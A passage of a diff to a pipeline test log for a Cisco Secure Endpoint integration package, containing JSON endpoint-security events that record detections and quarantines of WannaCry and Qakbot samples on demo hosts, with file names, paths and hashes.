a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log 
@@ -1,53 +1,53 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
